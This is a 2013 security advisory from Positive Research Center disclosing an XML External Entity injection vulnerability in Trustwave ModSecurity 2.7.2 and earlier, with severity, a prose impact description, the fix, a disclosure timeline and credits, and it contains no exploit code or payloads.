PT-2013-22: XML External Entity Injection in Trustwave ModSecurity Vulnerable softwareTrustwave ModSecurity Version: 2.7.2 and earlierApplication link: http://www.modsecurity.orgSeverity levelSeverity level: High Impact: Internal Network Resources and File System Access, Denial of Service Access Vector: Remote CVSS v2: Base Score: 10 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)CVE: not assigned Software descriptionTrustwave ModSecurity is a web application layer firewall.Vulnerability descriptionPositive Research Center experts have discovered "XML External Entity Injection" vulnerability in Trustwave ModSecurity. If an attacker sends specially crafted request containing malformed XML to server with ModSecurity, the server will automatically send the contents of local or remote resources to the attacker's server. It also makes possible to conduct denial of service attacks.How to fixUpdate your software up to the latest version.Advisory status 27.02.2013 - Vendor gets vulnerability details 29.03.2013 - Vendor releases fixed version and details 01.04.2013 - Public disclosureCreditsThe vulnerability was discovered by Timur Yunusov, Alexey Osipov, Positive Research Center (Positive Technologies Company)Referenceshttp://en.securitylab.ru/lab/PT-2013-22 Reports on the vulnerabilities previously discovered by Positive Research:http://ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/